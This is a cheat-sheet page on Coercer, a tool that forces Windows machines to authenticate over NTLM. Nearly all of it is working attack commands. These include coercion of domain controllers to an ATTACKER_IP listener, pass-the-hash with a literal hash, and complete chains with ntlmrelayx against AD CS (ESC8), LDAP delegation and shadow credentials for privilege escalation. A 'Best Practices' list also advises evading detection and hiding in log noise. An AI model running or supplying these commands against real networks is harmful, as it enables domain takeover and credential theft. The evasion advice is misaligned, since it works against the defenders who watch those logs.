Ir al contenido
1337skills 1337skills - Hojas de Trucos

Coercer

Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.

Installation

Sección titulada «Installation»

Via pip

Sección titulada «Via pip»
pip install coercer

From GitHub

Sección titulada «From GitHub»
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --help

Requirements

Sección titulada «Requirements»
  • Python 3.8+
  • impacket
  • pycryptodomex
  • requests
  • argparse

Quick Start

Sección titulada «Quick Start»

Basic coercion with credentials:

coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Scan target to identify working methods:

coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Coerce with NTLM hash:

coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAIN

Coercion Methods

Sección titulada «Coercion Methods»

Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:

MethodServiceProtocolMS-RPC InterfaceImpact
PetitPotamEfsRpc\\pipe\efsrpcEfsRpcHigh - SYSTEM auth
PrinterBugSpooler\\pipe\spoolssPrinter (RPC)High - SYSTEM auth
DFSCoerceMSDFS\\pipe\netdfsNetDFSMedium - SYSTEM auth
ShadowCoerceShadow Copy VSS\\pipe\vssadminFSRVPMedium - SYSTEM auth
MSEFSRCoerceEFSRPC\\pipe\efsrpcEfsRpcHigh - SYSTEM auth
WebexecWebClientHTTPIOCTLMedium - User context
DFSCoerceRPCMSDFS\\pipe\netdfsNetDFSMedium - SYSTEM auth
RprRemoteFindFirstFileRemoteRegistry\\pipe\winregRemoteRegistryLow - Registry read
EfsRpcOpenFileRawEfsRpc\\pipe\efsrpcEfsRpcHigh - SYSTEM auth
LsasrvLSA\\pipe\lsarpcLSAMedium - LSASS auth
TssessionTerminal Services\\pipe\tssessionTermSrvLow - TS context

Scan Mode

Sección titulada «Scan Mode»

Enumerate which coercion methods work without triggering full authentication:

# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN

# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam

# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc

# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc

# Scan with timeout per method
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10

Coerce Mode

Sección titulada «Coerce Mode»

Trigger actual NTLM authentication to listener:

# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam

# Coerce with output verbosity
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v

# Coerce to alternative port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30

Fuzz Mode

Sección titulada «Fuzz Mode»

Discover new coercion methods by fuzzing RPC endpoints:

# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100

# Fuzz with specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc

# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30

Authentication Options

Sección titulada «Authentication Options»

Username/Password Authentication

Sección titulada «Username/Password Authentication»
coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAIN

NTLM Hash Authentication (Pass-the-Hash)

Sección titulada «NTLM Hash Authentication (Pass-the-Hash)»
coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Kerberos Authentication

Sección titulada «Kerberos Authentication»
coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -k

No Authentication

Sección titulada «No Authentication»
coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-pass

Local Authentication

Sección titulada «Local Authentication»
coercer coerce -l LISTENER -t TARGET --local

Listener Setup

Sección titulada «Listener Setup»

Using ntlmrelayx (SMB Relay)

Sección titulada «Using ntlmrelayx (SMB Relay)»
# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support

# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Using Responder (LLMNR/NBT-NS)

Sección titulada «Using Responder (LLMNR/NBT-NS)»
# Terminal 1: Start Responder
responder -I eth0 -v

# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Custom SMB Server Listener

Sección titulada «Custom SMB Server Listener»
# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp

# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

Listening on Specific Port

Sección titulada «Listening on Specific Port»
coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAIN

Common Attack Chains

Sección titulada «Common Attack Chains»

Coerce to ntlmrelayx → AD CS ESC8

Sección titulada «Coerce to ntlmrelayx → AD CS ESC8»
# Terminal 1: Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support

# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN

Coerce to ntlmrelayx → LDAP for RBCD

Sección titulada «Coerce to ntlmrelayx → LDAP for RBCD»
# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access

# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN

Coerce to Relay for Shadow Credentials

Sección titulada «Coerce to Relay for Shadow Credentials»
# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials

# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAIN

Coerce Machine Account to Relay for Privilege Escalation

Sección titulada «Coerce Machine Account to Relay for Privilege Escalation»
# Scan first to find working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN

# Coerce DC to listener for relay to ADCS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotam

WebDAV Coercion

Sección titulada «WebDAV Coercion»

Force HTTP authentication instead of SMB for cross-protocol relay attacks:

# Enable WebDAV coercion (requires WebClient service running)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN

# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN

# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server

coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAIN

Filtering Options

Sección titulada «Filtering Options»

Filter by Method Name

Sección titulada «Filter by Method Name»
# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam

# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"

Filter by Protocol Name

Sección titulada «Filter by Protocol Name»
# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc

# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"

Filter by Pipe Name

Sección titulada «Filter by Pipe Name»
# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc

# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"

Combine Filters

Sección titulada «Combine Filters»
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
  --filter-method PetitPotam \
  --filter-protocol EfsRpc

Troubleshooting

Sección titulada «Troubleshooting»

Target Unreachable

Sección titulada «Target Unreachable»
# Verify connectivity
ping TARGET_IP

# Test SMB connectivity
smbclient -L //TARGET_IP -u domain\\user -p password

# Test with timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30

Authentication Failed

Sección titulada «Authentication Failed»
# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN

# Use NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAIN

Service Not Available

Sección titulada «Service Not Available»
# Some methods require specific services running
# Check if MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Try with timeout increase
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60

No Working Methods Found

Sección titulada «No Working Methods Found»
# Method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v

# Enumerate installed hotfixes
wmic qfe list brief /format:list

Listener Connection Issues

Sección titulada «Listener Connection Issues»
# Verify listener is running and accessible
telnet LISTENER_IP 445

# Check firewall rules
sudo ufw allow 445/tcp

# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -v

Best Practices

Sección titulada «Best Practices»
  1. Always Scan First: Use coerce scan to identify working methods before triggering full coercion
  2. Use Specific Methods: Target known-working methods to avoid noise and detection
  3. Filter Results: Leverage filtering to reduce network activity and operational footprint
  4. Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
  5. Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
  6. Patch Management: Target systems with outdated patches are more likely to support multiple methods
  7. Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
  8. Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
  9. Clean Relay Chains: Ensure ntlmrelayx or relay tool is properly configured before coercing
  10. Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
Sección titulada «Related Tools»
ToolPurpose
PetitPotamStandalone EfsRpc coercion tool; foundation for Coercer
ntlmrelayxNTLM relay framework to authenticate against other services
ResponderLLMNR/NBT-NS poisoning and relay tool
CertipyActive Directory Certificate Services enumeration and exploitation
krbrelayxKerberos relay attacks and alternative authentication methods
SpoolSampleStandalone PrinterBug implementation
PrintNightmareRCE exploit for CVE-2021-1675 via Print Spooler
Shadow CredentialsCredential dumping via shadow credentials in Active Directory